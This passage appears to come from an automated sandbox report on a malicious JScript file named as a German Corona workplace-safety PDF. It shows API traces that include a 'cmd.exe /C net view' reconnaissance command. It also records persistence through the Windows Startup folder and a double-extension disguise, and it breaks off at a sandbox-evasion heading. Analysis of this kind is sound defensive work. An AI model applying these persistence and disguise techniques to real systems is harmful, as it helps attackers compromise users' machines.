"radDC873.tmp");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\radDC873.tmp");IFileSystem3.GetSpecialFolder("1");IFileSystem3.BuildPath("Unsupported parameter type 00000009", "cmd.exe");IWshShell3.Run("C:\Windows\System32\cmd.exe /C net view > "C:\Users\user\AppData\Local\Te", "0", "true");([])([])([])([])([])([])([])([])([])([])([])([])([])([])([])([])([])([])([])([])([])([]

Boot Survival:

Drops script or batch files to the startup folder
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.js
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.js
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.js
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.js\:Zone.Identifier:$DATA

Hooking and other Techniques for Hiding and Protection:

Uses an obfuscated file name to hide its real file extension (double extension)
Source: Possible double extension: pdf.js | Static PE information: Arbeitsschutzregel-Corona-September.pdf.js
Source: C:\Windows\System32\wscript.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:
